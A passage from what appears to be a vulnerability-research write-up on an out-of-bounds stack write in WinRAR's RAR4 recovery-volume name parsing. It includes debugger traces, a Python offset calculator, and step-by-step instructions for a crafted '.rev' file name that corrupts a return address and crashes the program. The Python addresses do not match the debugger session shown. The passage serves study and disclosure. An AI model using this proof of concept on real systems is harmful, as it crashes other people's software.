0:000> ?(-a8 + 8) / 8
Evaluate expression: -20 = ffffffff`ffffffec

I need RAX to be set to decimal -20, or hexadecimal ffffffff`ffffffec at the time of the out of bounds write. But recall that there are two variables that get added together to determine EAX as seen below.

.text:000000000003F7D8 mov     eax, dword ptr [rbp+20490h+var_6450]
.text:000000000003F7DE add     eax, r13d
.text:000000000003F7E1 cdqe
.text:000000000003F7E3 mov     [r12+rax*8-8], rdi

With my test file name of “BIGTEST2.part__-5-1.rev”, EAX was first set to 1 and R13D was set to -5 before being added to EAX. Since the 1 is still added to the total, I have to replace the -5 with -21. Adding 1 then gives -20, which should overwrite the return address. Let’s try.
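The arithmetic above can be double-checked in Python by inverting the address formula. The helper name `index_for_target` is my own. R12 and the return-address slot are the values from the debugger output above.

```python
def index_for_target(r12: int, target: int) -> int:
    """Solve r12 + rax*8 - 8 == target for rax (the inverse of the write address)."""
    delta = target - r12 + 8
    if delta % 8:
        raise ValueError("target is not reachable with an 8-byte stride")
    return delta // 8


R12 = 0x38CF2EEBB0        # from `r r12`
RET_SLOT = 0x38CF2EEB08   # slot holding the return address RAR+0x3ef05
rax = index_for_target(R12, RET_SLOT)
print(rax)      # -20
print(rax - 1)  # -21: the file name's other value adds 1, so this one must be -21
```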

BIGTEST2.part__-21-1.rev

This file name should pass all the checks:

I have two underscores to ensure I take the vulnerable code path.
I have -21 and +1 in the file name, which will be added together later on to make -20.
-20 is less than 0xff, so it will pass the safety check.
This -20 offset should result in the RDI value being written to the return address location on the stack.

I set a breakpoint on the write location and check to see what happens:

Breakpoint 0 hit
RAR+0x3f7e3:
00007ff6`6699f7e3 49897cc4f8      mov     qword ptr [r12+rax*8-8],rdi ds:00000008`678eeac8=00007ff66699ef05

0:000> r rdi
rdi=00000149d59f50c0

0:000> k
 # Child-SP          RetAddr               Call Site
00 00000008`678ce530 00007ff6`6699ef05     RAR+0x3f7e3
01 00000008`678eead0 00007ff6`669767de     RAR+0x3ef05
02 00000008`678f7400 00007ff6`6699b2cd     RAR+0x167de
03 00000008`678ff880 00007ff6`669bd618     RAR+0x3b2cd
04 00000008`678ff8c0 00007ffd`07567614     RAR+0x5d618
05 00000008`678ff900 00007ffd`07d626a1     KERNEL32!BaseThreadInitThunk+0x14
06 00000008`678ff930 00000000`00000000     ntdll!RtlUserThreadStart+0x21

0:000> p
RAR+0x3f7e8:
00007ff6`6699f7e8 8b742434        mov     esi,dword ptr [rsp+34h] ss:00000008`678ce564=00000000

0:000> k
 # Child-SP          RetAddr               Call Site
00 00000008`678ce530 00000149`d59f50c0     RAR+0x3f7e8
01 00000008`678eead0 00000008`678eeb70     0x00000149`d59f50c0
02 00000008`678eead8 00000000`00000002     0x00000008`678eeb70
03 00000008`678eeae0 00000008`678eebd0     0x2
04 00000008`678eeae8 00000000`00000002     0x00000008`678eebd0
05 00000008`678eeaf0 00000000`00000000     0x2

In the above output, we can see that the value in RDI has overwritten a return address on the stack, corrupting the call stack. Now if I continue execution…

0:000> g
(4e0.242c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00000149`d59f50c0 084e9d          or      byte ptr [rsi-63h],cl ds:00000008`678fe7dd=7f

An access violation! That’s it, a working PoC. RIP now points at the REV object, and the CPU is trying to execute it as code. This fails because the object lives in heap memory that is not executable (PAGE_READWRITE, as shown below).

0:000> !address rip
...                                  
Usage:                  Heap
Base Address:           00000149`d5980000
End Address:            00000149`d59f9000
Region Size:            00000000`00079000 ( 484.000 kB)
State:                  00001000          MEM_COMMIT
Protect:                00000004          PAGE_READWRITE
Type:                   00020000          MEM_PRIVATE
Allocation Base:        00000149`d5980000
Allocation Protect:     00000004          PAGE_READWRITE
More info:              heap owning the address: !heap 0x149d5980000
More info:              heap segment
More info:              heap entry containing the address: !heap -x 0x149d59f50c0

Conclusion

If you want to make your own corrupt RAR file to trigger this bug, here are the steps:

Create a RAR4 archive using WinRAR.
Ensure the archive is split into multiple components.
Include one recovery volume in your archive.
Once created, rename the recovery volume to end with “.part__-21-1.rev”.
Delete one of the other parts of the archive.
Attempt to extract your archive in WinRAR.

This should cause WinRAR to crash.
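The renaming step can be scripted. This is a hypothetical helper, not part of WinRAR. It assumes the “.partN.rev” naming used throughout this post. The -21 is the offset worked out above for the stack layout seen in my debugging sessions, so it may need adjusting on a different build or setup.

```python
from pathlib import Path


def poc_rev_path(rev: Path, suffix: str = ".part__-21-1.rev") -> Path:
    """Return the recovery-volume path renamed to end with `suffix`.

    Assumes everything before ".part" is the archive's base name,
    e.g. "BIGTEST2.part001.rev" -> "BIGTEST2".
    """
    base = rev.name.split(".part", 1)[0]
    return rev.with_name(base + suffix)


print(poc_rev_path(Path("BIGTEST2.part001.rev")).name)  # BIGTEST2.part__-21-1.rev
```

The actual rename is then `rev.rename(poc_rev_path(rev))`.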

I spent some time trying to think of ways to weaponize this bug, but I think that’s very unlikely to be possible. The main problem is that you can control only the location of the out of bounds write, not its contents, and the pointer being written is not very useful. One idea was to overwrite a stack variable with the pointer in the hope that it could trigger another, more useful bug.

For example, let’s say there is a memcpy operation that relies on a pointer or value stored on the stack. If I could overwrite it with my pointer, it may allow me to copy too much data, or to copy the data to the wrong location. If that data is controllable by me, then it could possibly lead to a more interesting and exploitable bug. I spent a little time looking for something like this but didn’t find one.

Regardless, this was a fun exercise to hone my skills. I look forward to the next challenge!